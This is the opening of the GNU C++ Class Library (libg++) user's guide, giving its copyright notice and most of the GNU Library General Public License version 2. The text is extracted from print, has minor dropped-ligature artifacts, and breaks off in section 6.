refinedweb
221
64.81
CodePlexProject Hosting for Open Source Software My role on this project is essentially UI layer, limited MVC3 Experience...so far. Results: The correct view is being injected into the page as expected but none of the values appear to be populating? Any ideas, ran thru debugger but really doesnt help me if I have limited MVC3 at this point. Any ideas of why my vars may not be populating? NOTE: var contentTypeClassName Value = "w-s-capability" (is this significant to my issue?) Thanks in advance. (ContentType View Code Below) @using Orchard.Utility.Extensions; @{ Layout.Title = Model.Title; var contentTypeClassName = ((string)Model.ContentItem.ContentType).HtmlClassify(); } <div class="SkillsSmartsBox" style="border-top:1px solid #666666; width:300px;"> <div class="boxLeft"> <p><span class="SSViewD"> </span></p> </div> <div class="boxRight"> <h2 class="para title1"><span class="panelTitleD">@Model.CapabilityTitle</span></h2> <p class="skilldescrip">@Model.CapabilitySubhead </p> <a href="#" class="collapsePanel">-</a> @Model.Body </div> <div class="clear"></div> </div> I think you need to go through the content item and the part. Use Shape Tracing to determine how to get to your properties. I'd guess something like Model.ContentItem.WSCapability.CapabilityTitle. Well I installed Shape Tracing Module, but it certainly is not behaving as I would have hoped. Upon launch I had many .js errors, so my assumption was that some of my jquery includes @document level were stepping on the shapetracing mod and its jquery, so commented out my references in document, but still having alternative .js issues with this module. I do get some functionality now, but its still almost unusable for all practical intents. I certainly have no editing capabilities as documentation states, but do see some limited model information. Using IE8/FF4. Any ideas or posts that may be helpful in resolving this issue that you are aware of? Done some searching but nothing seems to be relevant so far. I can certainly see how this module might be helpful (if i could get it to work) :). Take any links you may be able to provide. Thanks. When you include jQuery, do you do it with @Script.Require("jQuery") - because that's how you should do it to avoid conflicts. Document.cshtml I have been commenting these out, is this wrong? /* Global includes for the theme ***************************************************************/ Script.Include("jquery-1.4.4.min.js").AtHead(); Script.Include("jquery.collapser.min.js").AtHead(); Script.Include("jquery.juitter.js").AtHead(); Script.Include("system.js").AtHead(); Script.Include("Capabilities.js").AtHead(); so to your point, I should change my include references to follow the syntax above on my document.cshtml file? I'm saying the way you're including jQuery is wrong. Orchard comes with its own version of jQuery, which some of the core modules rely on. There's a system of named resources, so instead of including your own copies of the files you use a centralised resource which everything has access to. Meaning that your website has to access less files, namespace conflicts are avoided, and you always get the latest version when Orchard is updated. The correct syntax is: @Script.Require("jQuery").AtHead(); You can look at ResourceManifest.cs in the Orchard.jQuery module to see all the other scripts that are already available. You should also use the resource manifest name if one is available; if not, you can implement your own resource manifest, and that script will then also be available for other modules or themes that use yours. roger that, think i know what we're talking about now, inherited some of this framework, just the UI guy...and sometimes developer guy (drinking from the firehose). Thanks. Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
https://orchard.codeplex.com/discussions/260822
CC-MAIN-2017-51
refinedweb
641
58.58
Agenda See also: IRC log resolution: no objection on the global structure of TCDL CV: issues in the metadata? CS: in BenToWeb we used DC terms of the year 2002 (previous version), it has been changed as of january ... we can now use dc:date and dc:description CV: dc:description is not in the "formalMetadata" section ... can one have markup in dc:description? CS: yes, can derive any datatype SAZ: we need to describe the datatype we use, whichever it is (and XSD should be ok) resolution: no objections to using dc:date (instead of just date), with datatype xs:date CV: any objections to "Extension"? SAZ: yes, the extension model is not adequate CS: want to avoid having extension all over the place, just one single point of extension SAZ: don't see the benefit of chosing this model, could equally well have parsers simply ignore elements and attributes they don't know CS: this is one way of doing it SAZ: agree, philosophical discussion. what is the group preference? CI: agree with SAZ, no point of restricting the extension model CR: no point of restricting the extension model SAZ: just to be clear, both methods provide a way of extending the core vocabulary CS: the current proposal is to extend at the end of each element at a well defined extension point VE: not sure which method is better. the method used in BenToWeb proved useful but there may be a better approach too CV: both methods work, prefer to keep it as is ... one the one hand SAZ and CI wanted to restrict the language, and now taking a liberal approach CI: we have a specific focus, so don't need an extension model ... once we have a stable language, we won't need extension ... but if you insist on having an extension model, then prefer to have it as open as possible SAZ: agree we have a specific focus so propose to have as small vocabulary as possible SAZ: on the other hand, need to be as flexible as possible for the future ... for example with EARL and TCDL CV: what is the resolution? do we add more extension points? SAZ: what is the problem of not defining extension points and just ignoring unknown elements/attributes ... note, this is not the BenToWeb spec, just the convention of this TF CS: it is good to be flexible but comes at the cost of accurate validation ... also, any added elements should be in a separate namespace SAZ: agree, not good practice to modify someones elses schema CV: we expect the extensions to be content negotiation (HTTP request/response) and pointers, not sure we need others SAZ: for example, if you build a parser for the current TF vocabulary, it understands dc:creator and a bunch of other elements ... however, if you feed it metadata from the BenToWeb project ... which also contains additional elements such as dc:contributor ... validation will fail and it will reject the metadata ... even though dc:creator information is also in the BenToWeb metadata files ... if the parser would simply ignore unknown elements dc:contributor, then it could filter out the information it needs CV: two options - 1) leave it as it is, or 2) add more extension points CS: add more points where expect we may need them SAZ: 3rd option is to tell parsers to simply ignore elements or attributes they don't know CS: then you can extend anything and anywhere CI: yes, this is how many vocabularies are defined like HTML etc CV: this makes validation messy, not really the concept of XMLS SAZ: there are certain constriants, like cardinality CS: the new elements will be from different namespaces <Christophe> <xs:any CS: this will allow the core vocabulary to be validated, and additional elements from other namespaces as extension resolution: two options - the one described directly above, or the "Extension" method. this is for voting next week
http://www.w3.org/2006/09/19-tsdtf-minutes
CC-MAIN-2014-10
refinedweb
658
51.72
Samples for building an app that you can submit to both the Windows Store and the Windows Phone Store. Hundreds of samples from Microsoft to help jumpstart your project quickly. Provide search suggestions by using the in-app search control. Key APIs used include AppendQuerySuggestion and SearchBox. Create and show multiple views of the app, specify which view to show when the app is activated (using ApplicationViewSwitcher), and create custom animations for switching between views. Handle app activation for contact actions through the API of the Windows.ApplicationModel.Activation namespace. Get current location info for the user's PC with the Geolocation API. Learn how you can connect to OAuth providers such as Facebook, Flickr, Google, and Twitter using the WebAuthenticationBroker class. Get the tools and templates you need to start programming DirectX games for the Windows Store with C++. Add important features like an app bar, settings and privacy charms, and in-app purchases. Walk through the process of porting an OpenGL ES 2.0 graphics pipeline, and look up API mapping to Direct3D 11.1. Get articles, overviews, and walkthroughs for porting DirectX 9 games to DirectX 11.1 and the Windows Store. Learn about our new app models and the programming languages available to you. Choose a language and gain a solid understanding of new programming concepts. Add commonly used features, like file handling or multimedia playback to your app. The start-to-finish tutorial series helps you refine your app. Use the tools included with Visual Studio to make your app the highest quality possible before you submit it to the Windows Store. Find the APIs you need in whatever programming language you prefer. Learn how to use the Windows Runtime and the Windows Library for JavaScript to build apps. Ready to increase your reach? Start building apps now for Windows 8.1 Update and Windows Phone 8.1. The Windows SDK and the Windows Phone 8.1 SDK are components of Visual Studio 2013 Update 2. Microsoft Visual Studio Express 2013 for Windows 8.1 is your tool to build Windows Store apps. It includes the Windows SDK for Windows 8.1, Blend for Visual Studio, and project templates. Test your app before you submit it for certification and listing in the Windows Store. Learn more about the Windows App Certification Kit. Walk through Hilo, a complete Windows Store app that shows best practices for developing with JavaScript and HTML or C++ and XAML. Have an app on another platform that you'd like to bring to Windows? Use these design and development resources to make your job easier. ![CDATA[ Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use –. ]]>
http://msdn.microsoft.com/en-us/windows/apps/br229519.aspx
CC-MAIN-2014-15
refinedweb
469
67.55
This tutorial describes how to create and test a kernel extension (KEXT) for Mac OS X. In this tutorial, you’ll create a very simple kernel extension that prints text messages when loading and unloading. The tutorial assumes that you are working in a Mac OS X development environment. Anatomy of a KEXT Roadmap Create a new Project using Xcode Build the Kernel Extension Test the Kernel Extension Where to Go Next To better understand what you’re doing, it helps to know what’s inside a kernel extension. In Mac OS X, all kernel extensions are implemented as bundles — folders that the Finder treats as single entities. Kernel extensions have names ending in .kext. In addition, all kernel extensions contain the following: A property list (plist) —a text file (in XML, Extensible Markup Language, format) that describes the KEXT’s contents and requirements. This is a required file. A KEXT need contain nothing more than a property list file. A KEXT binary —Generally, a KEXT has one binary file, but it can have none (locally). However, if it has none, its property list must reference another KEXT and change its default settings. In this way, one KEXT can override or change the behavior of another KEXT. A KEXT binary is also sometimes called a kernel module. Optional Resources —Resources are useful if your KEXT needs to display an icon. In this tutorial, you’ll create, build, load, and run a simple kernel extension. Here are the steps you will follow: “Create a new Project using Xcode” “Build the Kernel Extension” “Test the Kernel Extension” You’ll use the Xcode application to create and build your KEXT. You’ll use the Terminal application to type the commands to load and test your KEXT and view the results. If you have never used Xcode before, you may also wish to read Xcode Quick Tour for Mac OS X. A project is a document that contains all your files and targets. Targets are the things you can build from your project’s files. A simple project has just one target that builds an application. A complex project may contain several targets. The parts of your project can be found later on your disk. These include the source files as well as the targets (your KEXT). Xcode does not store these files in any special format, so you can view or edit the source files with another editing program if you wish. For now, we recommend using Xcode. Here’s how you’ll create the kernel extension project: “Create a Kernel Extension Project” “Implement the Needed Methods” “Edit the KEXT’s Settings” The examples below assume that you will be logging in as an administrator of your machine. The account name in the examples is admin. If you use a different login account, be sure to substitute accordingly. Some of the commands you will be using require root privileges so you will be using the sudo command. The sudo command allows permitted users (such as an admin user) to execute a given command with root privileges. If you use a different login account, make sure it has administrative access. Kernel extensions are created and edited in Xcode, Apple’s Integrated Development Environment (IDE). From a Desktop Finder window, locate and launch the Xcode application, found at /Developer/Applications/Xcode. If this is the first time you’ve run Xcode, you’ll see the new user Assistant. The Assistant asks you to make some decisions about your environment. For now, choose the defaults. When you have finished with the Assistant, choose New Project from the File menu. In the New Project Assistant, scroll down to the Kernel Extension section and choose Generic Kernel Extension. Click Next. For the Project Name, enter “HelloKernel”. The default location is your home directory; however, if you create many projects, you should make a directory to hold them. Edit the Location to specify a “Projects” subdirectory, for example: When you click Finish, Xcode creates the new project and displays its project window. The new project contains several files already, including a default source file, HelloKernel.c. If necessary, select HelloKernel in the Groups & Files pane. Double-click the HelloKernel.c in the detail view to display the source code in a separate editor window. Figure 1 shows where you will find the HelloKernel.c file in the project window. The default source file does nothing but return a successful status; you’ll need to add some additional code. In particular, you will need to implement the initialization and termination code for your KEXT. The default template merely contains suggestions for these routines, as a place for you to begin. Change the contents of HelloKernel.c to match the code in Listing 1. Save your changes by choosing File > Save. Close the separate editor window by clicking the red close button in the upper left. Notice that HelloKernel.c includes two header files, sys/systm.h and mach/mach_types.h. Both header files reside in Kernel.framework. When you develop your own KEXT, be sure only to include header files from Kernel.framework (in addition to any header files you create) because only these files have meaning in the kernel environment. If you include headers from outside Kernel.framework, your KEXT might compile, but the functions and services those headers define will not be available in the kernel. Your kernel extension contains a property list, or plist, that tells the operating system what your KEXT contains and what it needs. If viewed from a text editor, the property list would be in XML (Extended Markup Language) format. However, you will be viewing and editing the plist information from within Xcode. By default, Xcode allows you to edit your KEXT’s property list as plain XML text in the Xcode editor window. However, it’s easier to view and edit the property list file with the Property List Editor application. You can tell Xcode to open property list files using Property List Editor by following these steps: Choose Xcode > Preferences and click the File Types icon. The File Types pane lists all the folder and file types that Xcode handles and the preferred editor for each type. Click the disclosure triangle for file. Then click the disclosure triangle for text. Select text.xml and click Default (Plain Text File) in the Preferred Editor column. Choose External Editor and select Other from the menu that appears. Select Property List Editor in /Developer/Applications/Utilities/Property List Editor and click OK. Now Xcode lists External Editor (Currently Property List Editor) in the Preferred Editor column for text.xml. Click OK to close the Xcode Preferences window. Now you can edit your KEXT’s Info.plist file using Property List Editor: Select HelloKernel in the Groups & Files view. Double-click Info.plist in the Xcode project window. Xcode starts Property List Editor, which displays the Info.plist file. (If Property List Editor displays a second editing window named Untitled, dismiss it by clicking the red close button in the upper left.) If this doesn’t work due to a misconfigured project, you can control-click the name of the file and choose “Open with Finder” from the resulting contextual menu. This should have the same effect. In Property List Editor, click the disclosure triangle next to Root. You should see the elements of the property list file, as shown in Figure 2. Change the value of the CFBundleIdentifier property from the default chosen by Xcode. Apple has adopted a “reverse-DNS” naming convention to avoid namespace collisions. This is important because all kernel extensions share a single “flat” namespace. By default, Xcode names a new KEXT com.yourcompany.kext.<projname>, where <projname> is the name you chose for your project. You should replace the first two parts of this name with your actual reverse-DNS prefix, (for example: com.apple, edu.ucsd, and so forth). For this tutorial, you will use the prefix com.MyTutorial. On the line for CFBundleIdentifier, double-click on com.yourcompany.kext.HelloKernel in the Value field. Double-click on yourcompany and change this string to MyTutorial. The CFBundleVersion property contains the version number of your kernel extension in the ’vers’ resource style (for more information on this, see and Technical Note TN1132). By default, Xcode assigns new kernel extensions the version number 1.0.0d1. You can change this value if you wish, but your KEXT must declare some version in the ’vers’ resource style to be loaded successfully. To change the version value of your KEXT, click on the line for CFBundleVersion and double-click on 1.0.0d1 in the Value field. For this tutorial, leave the CFBundleVersion property with the default value 1.0.0d1. Mac OS X requires a KEXT that depends on other loadable extensions or on in-kernel components to declare its dependencies in its plist. This information must be contained in the OSBundleLibraries dictionary at the top level of the plist. You need to determine which loadable extensions or in-kernel components your KEXT depends on. You should examine the #include directives in your kernel extension’s code and find the corresponding KEXTs in “Kernel Extension Dependencies.” In this tutorial, “HelloKernel” includes sys/systm.h and mach/mach_types.h so you will create an entry for com.apple.kernel.bsd and an entry for com.apple.kernel.mach. Click on the line for OSBundleLibraries and click on the disclosure triangle at the beginning of the line. The button previously labeled New Sibling should change to New Child. It not, check to be sure the disclosure triangle next to OSBundleLibraries is pointing down. Click the button that now says New Child (as soon as you do, it will change back to New Sibling). A new item will appear below OSBundleLibraries. Change the name from New item to com.apple.kernel.bsd. Double-click on the value field and enter 6.9.9. Click the New Sibling button and change the name from New item to com.apple.kernel.mach. Double-click on the value field and enter 6.9.9. Save your changes by choosing File > Save from the Property List Editor menu. You won’t be making any more changes to your KEXT’s Info.plist file in this tutorial, so you can quit the Property List Editor application and return to Xcode by choosing Property List Editor > Quit Property List Editor. Xcode also allows you to modify or create build settings for your KEXT. These settings define information that will be compiled into the kernel extension’s executable. On the left, in the Groups & Files view, click the disclosure triangle next to Targets and select HelloKernel (you don’t have to click the disclosure triangle next to HelloKernel). Click the Get Info button in the tool bar (it’s the round blue button with an “i” in the middle). Select the Build view and scroll down to the bottom of the Customized Settings list. Change the name of the module from the default chosen by Xcode (the value of the MODULE_NAME setting). Click on the line for MODULE_NAME and double-click on com.yourcompany.kext.HelloKernel in the Value field. Double-click on yourcompany and change this string to MyTutorial. Be sure that the MODULE_NAME value matches the value of the CFBundleIdentifier you entered in your kernel extension’s Info.plist file or your KEXT will not run. The MODULE_START and MODULE_STOP variables contain the names of your KEXT’s initialization and termination routines. Be sure that these variables have the values used in your HelloKernel.c file. That is, for this tutorial, be sure these variables have the values HelloKernel_start and HelloKernel_stop, respectively. If you changed the names of the initialization and termination routines when entering the code in the previous section, make sure that the values for these variables match the names you used! Otherwise, your KEXT will not run. The value of the MODULE_VERSION variable is in the ’vers’ resource style and must be numerically identical to the CFBundleVersion value in the kernel extension’s Info.plist file or your KEXT may not load. For this tutorial, make sure the MODULE_VERSION variable has the value 1.0.0d1. Here’s how you’ll build the kernel extension: “If There Were No Errors” “Build the Project Again” Click the Build button in the upper left corner of the editor window or select Build from the Build menu. The Build button looks like a hammer and is illustrated in Figure 3. If Xcode asks you whether to save some modified files, select all the files and click “Save All”. Figure 4 shows the Save dialog. Xcode starts building your project. It stops if it reaches an error in the code. If you made any errors typing in the code, Xcode will stop and show you the errors in both the editor window (if you haven’t closed it) and the main project window. In the project window, click the disclosure triangle next to Errors and Warnings in the Groups & Files view to reveal the files that contain errors. If you select a file listed under Errors and Warnings, Xcode lists the errors in that file, each accompanied by a short description of the problem. Double-click the file name to open an editor window and edit the source code. The source code with the error will appear in the editing window, as shown in Figure 5. You can edit the source code inside the editing window. Correct the error, save your changes, and build the project again. If you didn’t have any errors, you can insert one so that you can try out the error-handling facility. Try removing the semicolon at the end of one of the lines of code, as shown in Listing 2. Listing 2 HelloKernel.c with error Click the Build button. If Xcode asks you whether to save some modified files, select all the files and click “Save All”. Xcode starts building your project again. If there is an error, fix the error as described above in “Fix Any Errors.” Otherwise, if the build succeeds, you can move on to loading the extension. This section shows how to test the kernel extension. You’ll load your KEXT with the kextload command, you’ll use the kextstat command to see that it’s loaded, and finally, you’ll unload your KEXT from the kernel with the kextunload command. You’ll use the Terminal application to type the commands to load and unload your KEXT. You’ll view the results as they are written to the system log file, /var/log/system.log. Note: This tutorial uses the “ %” prompt when it shows the commands you type in the Terminal application. This is the default prompt of the tcsh shell. If you’re using a different shell, you may see a different prompt. For example, the prompt in the bash shell, which is the default shell in Mac OS X version 10.3, is “ $”. Here’s how you’ll test your KEXT: “Getting Root Privileges” “Start the Terminal Application” To use the kextload and kextunload commands you must have root or super user privileges. Instead of logging in as root, for this tutorial you will use the sudo command which gives permitted users the ability to execute a given command as root. By default, Mac OS X allows admin and root users to use the sudo command, so make sure you are currently logged in to an admin account before using sudo. An admin user is a user who has “Allow user to administer this computer” checked in the Security view of the Accounts system preference. Start the Terminal application. From a Desktop Finder window, locate and launch the Terminal application, found at /Applications/Utilities/Terminal. To view the system log file, enter the following command at the Terminal prompt: Open a second window in the Terminal application. Choose File > New Shell from the Terminal menu. Position this window so that you can view both windows easily. You will load your KEXT from the second window. In the second Terminal window, move to the directory that contains your KEXT. Xcode stores your KEXT in the Debug folder of the build directory of your project location (unless you’ve set a different location for build products using Xcode’s Preferences dialog). Use the cd command to move to the appropriate directory. For example: This directory contains your KEXT. You can use the ls command to view the contents of this directory. For example: Your KEXT should have the name HelloKernel.kext. Note that this name is formed from the project name and a suffix, .kext. Important: For purposes of packaging, distribution, and installation, the filename of the KEXT (apart from the suffix) does not matter. However, the name of the KEXT binary (stored in the KEXT’s property list) should be unique, using the recommended “reverse-DNS” naming convention. From a Desktop Finder window, a KEXT appears as a single file (look for it from the Desktop if you like). From the Terminal application, however, a KEXT appears as a directory. The KEXT directory contains the contents of your KEXT, including the plist ( Contents/Info.plist) and the KEXT binary ( Contents/MacOS/HelloKernel). View the contents of the KEXT directory. Use the find command. For example: You are now ready to load and run (and then unload) your KEXT. to load and test. You should not change the ownership and permissions of any of your KEXT files in your own directory, because you will no longer be able to save them after working on them. For this tutorial, you will use the sudo command to copy the KEXT binary ( HelloKernel.kext) to the /tmp directory the following steps to copy the new version to the /tmp directory to load and test it. At the prompt, you’ll use the cp -R command with the sudo command to copy your KEXT to /tmp. The cp command copies files from one place to another and the -R option tells cp to copy a directory and its entire subtree (like HelloKernel.kext). When prompted for a password, enter your admin password. (Note that nothing is displayed as you type the password.) Warning: If you use tab-completion to avoid typing all of HelloKernel.kext, you’ll get a “/” after the KEXT name. Be sure to delete this slash before you press Return. If you don’t, the cp command will copy only the contents of the HelloKernel.kext directory to /tmp, instead of copying the directory and its entire subtree. Type the following to copy your KEXT to /tmp: Check the ownership and permissions of your KEXT by moving to the /tmp directory and using the ls -l command: The -l makes the ls command display extra information about the files in a directory. From the /tmp directory, use the kextload command with the sudo command; this loads your KEXT and runs its initialization ( start) function. Note that you may not have to re-enter your password this time. This is because you’re allowed to continue to use sudo for a short period (usually about 5 minutes) without reauthenticating. For example: The -v is optional; it makes kextload provide more verbose information. In the other Terminal window, view the system log. In a few moments, this line will appear: Use the kextstat command to check the status of the KEXT. This command displays the status of all dynamically-loaded KEXTs. Enter the command: You’ll see several lines of output, including a line for your KEXT at the end. Unload the KEXT binary. Use the kextunload command with the sudo command. This command unloads your KEXT and runs its termination ( stop) function. For example, from the /tmp directory: Note that you may have to enter your admin password this time if it’s been more than a few minutes since the last time you entered your password. View the system log. In a few moments, several lines will appear, including: Stop the system log display. The tail -f command you used to view the system log will continue to run until you stop it. In the Terminal window displaying the system log, press the control key and the c key at the same time. As an alternative to the Terminal application, you can load and test your KEXT from console mode. In console mode, all system messages (such as this kernel extension’s message “KEXT has loaded!”) are written directly to your monitor screen. Messages appear much more quickly than when they are written to the system log file. However, you should keep in mind that console mode is not as flexible as the Terminal application. There are no windows, you cannot view your code in Xcode or run other applications at the same time, and you cannot use copy or paste. To use console mode, follow these steps: Log out of your account. From the Desktop, choose Log Out from the Finder menu. From the login screen, log in to console mode. Type >console as the user name, leave the password blank, and press Return. Be sure to include the > character at the beginning of the name. The screen turns black and looks like an old ASCII “glass terminal”. This is console mode. At the prompt, log in to your admin account. Move to the directory that contains your KEXT binary. Use the cd command. For example: Follow the instructions given in “Load the KEXT Binary.” Remember that the console messages will come directly to your screen; you do not need to view the system log file. When you have finished, log out of console mode by entering the command logout. Congratulations! You’ve now written, built, loaded, and unloaded your own kernel extension. In the next tutorial in this series, “Hello I/O Kit: Creating a Device Driver With Xcode,” you’ll learn how to create a device driver, a special kind of KEXT that allows the kernel to interact with devices. If you’re interested, you can use the man command to read the manual pages for kextload, kextstat, and kextunload. For example, from a Terminal window, enter the command More information about the ‘vers’ resource can be found in the “Finder Interface” chapter of Inside Macintosh—Files, or online at. Additional useful reference material can be found in Core Foundation Documentation. Look here for documentation about Bundles, Property Lists, Collections (such as Dictionaries) and more. As you become more experienced in KEXT development, you should also read the articles in this document that cover more advanced topics, such as how to declare dependencies so that your KEXT targets the appropriate version of Mac OS X. The following articles provide more information on KEXT-related topics: “Kernel Extension Dependencies” “Kernel Extension Ownership and Permissions” Last updated: 2007-10-31
http://developer.apple.com/documentation/Darwin/Conceptual/KEXTConcept/KEXTConceptKEXT/hello_kext.html
crawl-002
refinedweb
3,822
65.32
What is wrong with this? cant figure it out... perhaps the square sign i'm using is the wrong square sign? the program isnt done, but i thought i check that 1st part, and keep getting the errorthe program isnt done, but i thought i check that 1st part, and keep getting the errorCode: #include <stdio.h> int main () { double m; double n; double side1; double side2; double hypo; printf ("Enter the side of n\n"); scanf ("%lf", &n); printf ("Now enter the side of m\n"); scanf ("%lf", &m); side1 = m^2 - n^2; printf ( "Side 1 is" ); printf ("%lf", side1); return 0 } 15 C:\Documents and Settings\Emir\Desktop\C\Class\triangle.c invalid operands to binary ^ ?
http://cboard.cprogramming.com/c-programming/69618-invalid-operands-binary-%5E-printable-thread.html
CC-MAIN-2014-41
refinedweb
119
78.89
You may already know about Python’s capability to create a simple web server in a single line of Python code. Old news. Besides, what’s the point of creating a webserver that only runs on your machine? It would be far more interesting to learn how to access existing websites in a single line of code. Surprisingly, nobody talks about this in the Python One-Liners community. Time to change it! This tutorial shows you how to perform simple HTTP get and post requests to an existing webserver! Problem: Given the URL location of a webserver serving websites via HTTP. How to access the webserver’s response in a single line of Python code? Example: Say, you want to accomplish the following: url = '' # ... Magic One-Liner Here... print(result) # ... Google HTML file: ''' <!doctype html><html itemscope="" itemtype="" lang="de"><head><meta content="text/html; charset=UTF-8" http-<meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title>... ''' You can try it yourself in our interactive Python shell: Exercise: Does this script download the complete source code of the Google.com website? Let’s learn about the three most important methods to access a website in a single line of Python code—and how they work! Method 1: requests.get(url) The simplest one-liner solution is the following: import requests; print(requests.get(url = '').text) Here’s how this one-liner works: - Import the Python library requeststhat handles the details of requesting the websites from the server in an easy-to-process format. - Use the requests.get(...)method to access the website and pass the URL ''as an argument so that the function knows which location to access. - Access the actual body of the get request(the return value is a request object that also contains some useful meta information like the file type, etc.). - Print the result to the shell. Note that the semicolon is used to one-linerize this method. This is useful if you want to run this command from your operating system with the following command: python -r "import requests; print(requests.get(url = '').text)" The output is the desired Google website: ''' <!doctype html><html itemscope="" itemtype="" lang="de"><head><meta content="text/html; charset=UTF-8" http-<meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title>... ''' Note that you may have to install the requests library with the following command in your operating system terminal: pip install requests A similar approach can be taken if you want to issue a post request: Method 2: requests.post(url) What if you want to post some data to a web resource? Use the post method of the requests module! Here’s a minimal one-liner example of the request.post() method: import requests as r; print(r.post('', {'key': 'val'}).text) The approach is similar to the first one: - Import the requestsmodule. - Call the r.post(...)method. - Pass the URL ''as the first parameter into the function. - Pass the value to be posted to the URL—in our case a simple key-value pair in a dictionary data structure. - Access the body via the textattribute of the requestobject. - Print it to the shell. Method 3: urllib.request A recommended way to fetch web resources from a website is the urllib.request() function. This also works to create a simple one-liner to access the Google website in Python 3 as before: import urllib.request as r; print(r.urlopen('').read()) It works similarly than before by returning a Request object that can be accessed to read the server’s response. We’re cramming everything into a single line so that you can run it from your OS’s terminal: python -r "import urllib.request as r; print(r.urlopen('').read())" Congrats! You now have mastered the art of accessing websites in a single line of Python code. If you’re interested in boosting your one-liner power, have a look at my new book:!!
https://blog.finxter.com/python-one-line-http-get/
CC-MAIN-2020-50
refinedweb
666
58.79
27 October 2009 11:06 [Source: ICIS news] LONDON (ICIS news)--Celanese’s third-quarter net earnings more than doubled year on year to $399m (€267m) from $158m due to a deferred tax benefit, the US chemicals major said on Tuesday. “The 2009 results included a benefit of approximately $382m related to a deferred tax benefit associated with the release of certain income tax valuation allowances,” it added in a statement. However, net sales for the three months ended 30 September were down 28% from the same period in 2008 to $1.304bn and operating profit fell 56% year on year to $65m. "Our third quarter results reflect stabilisation in demand across our major geographies and end-use applications with modest recovery in select areas,” said chairman and CEO David Weidman. “Continued strength in ?xml:namespace> The company said in its outlook that it continued to see modest recovery of global economics with increased volumes across all its businesses. It added the company planned to reduce costs by a further $100m. ($1 = €0.67)
http://www.icis.com/Articles/2009/10/27/9258220/celanese-reports-sharp-rise-in-q3-net-earnings-on-tax-benefit.html
CC-MAIN-2014-41
refinedweb
174
50.36
Opened 19 months ago Last modified 7 months ago #7243 new bug regression: acceptable foreign result types Description The following short file is rejected: import Foreign.Ptr foreign import ccall "wrapper" foo :: IO (FunPtr ()) The error is: test.hs:2:1: Unacceptable type in foreign declaration: IO (FunPtr ()) When checking declaration: foreign import ccall safe "wrapper" foo :: IO (FunPtr ()) However, my reading of the 2010 Report suggests this should be acceptable. Specifically: - Prelude.IO t is a marshallable foreign result type when t is a marshallable foreign type, - all basic foreign types are marshallable foreign types, and - FunPtr? a is a basic foreign type for all a. (Political note: I include this chain of reasoning not because I think others too stupid to recreate it, but because I think it likely that I am not reading the Report correctly, and want to make it easy to detect and correct any misconceptions I have.) Change History (6) comment:1 Changed 19 months ago by td123 - Cc gostrc@… added comment:2 Changed 19 months ago by romildo - Cc malaquias@… added comment:3 Changed 19 months ago by igloo - Component changed from Compiler to Compiler (FFI) - Difficulty set to Unknown - Milestone set to 7.6.2 - Owner set to igloo comment:4 Changed 19 months ago by simonpj comment:5 Changed 9 months ago by igloo - Owner igloo deleted comment:6 Changed 7 months ago by shelarcy - Cc shelarcy@… added Note: See TracTickets for help on using tickets. The problem is: e.g. this is accepted: I'll leave the ticket open, though, as I think we should give the expected pattern in the error message.
https://ghc.haskell.org/trac/ghc/ticket/7243
CC-MAIN-2014-15
refinedweb
273
53.75
Are you sure? This action might not be possible to undo. Are you sure you want to continue? last updated April 29, 1992 for version 2.0 Doug Lea (dl@g.oswego.edu) c Copyright 1988, 1991, 1992 Free Software Foundation, Inc. Permission is granted to make and distribute verbatim copies of this manual provided the copyright notice and this permission notice are preserved on all copies. Permission is granted to copy and distribute modied versions of this manual under the conditions for verbatim copying, provided also that the section entitled \GNU Library modied versions, except that the section entitled \GNU Library General Public License" may be included in a translation approved by the author instead of in the original English. Note: The GNU C++ library is still in test release. You will be performing a valuable service if you report any bugs you encounter. GNU LIBRARY GENERAL PUBLIC LICENSE 1 GNU LIBRARY GENERAL PUBLIC LICENSE Version 2, June 1991 c Copyright 1991 Free Software Foundation, Inc. 675 Mass Ave, Cambridge, MA 02139, USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. [This is the rst les) oer you this license which gives you legal permission to copy, distribute and/or modify the library. Also, for each distributor's protection, we want to make certain that everyone understands that there is no warranty for this free library. If the library is modied by someone else and passed on, we want its recipients to know that what they have is not the original version, so that any problems introduced by others will not re ect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that companies distributing free software will individually obtain patent licenses, thus in eect dierent from the ordinary 2 User's Guide to the GNU C++ Class Library eectively promote software sharing, because most developers did not use the libraries. We concluded that weaker conditions might promote sharing better. However, unrestricted linking of non-free programs would deprive the users of those programs of all benet les, but we have achieved it as regards changes in the actual functions of the Library.) The hope is that this will lead to faster development of free libraries. The precise terms and conditions for copying, distribution and modication follow. Pay close attention to the dierence modications and/or translated straightforwardly into another language. (Hereinafter, translation is included without limitation in the term \modication".) \Source code" for a work means the preferred form of the work for making modications to it. For a library, complete source code means all the source code for all modules it contains, plus any associated interface denition les, plus the scripts used to control compilation and installation of the library. GNU LIBRARY GENERAL PUBLIC LICENSE 3 Activities other than copying, distribution and modication oer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Library or any portion of it, thus forming a work based on the Library, and copy and distribute such modications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a. The modied work must itself be a software library. b. You must cause the les modied to carry prominent notices stating that you changed the les and the date of any change. c. You must cause the whole of the work to be licensed at no charge to all third parties under the terms of this License. d. If a facility in the modied Library refers to a function or a table of data to be supplied by an application program that uses the facility, other than as an argument passed when the facility is invoked, then you must make a good faith eort to ensure that, in the event an application does not supply such function or table, the facility still operates, and performs whatever part of its purpose remains meaningful. (For example, a function in a library to compute square roots has a purpose that is entirely well-dened independent of the application. Therefore, Subsection 2d requires that any application-supplied function or table used by this function must be optional: if the application does not supply it, the square root function must still compute square roots.) These requirements apply to the modied work as a whole. If identiable 4 User's Guide to the GNU C++ Class Library oering access to copy from a designated place, then oering equivalent access to copy the source code from the same place satises le that is part of the Library, the object code for the work may be a derivative work of the Library even though the source code is not. Whether this is true is especially signicant if the work can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely dened by law. If such an object le uses only numerical parameters, data structure layouts and accessors, and small macros and small inline functions (ten lines or less in length), then the use of the object le modication of the work for the customer's own use and reverse engineering for debugging such modications. GNU LIBRARY GENERAL PUBLIC LICENSE 5 modied executable containing the modied Library. (It is understood that the user who changes the contents of denitions les in the Library will not necessarily be able to recompile the application to use the modied 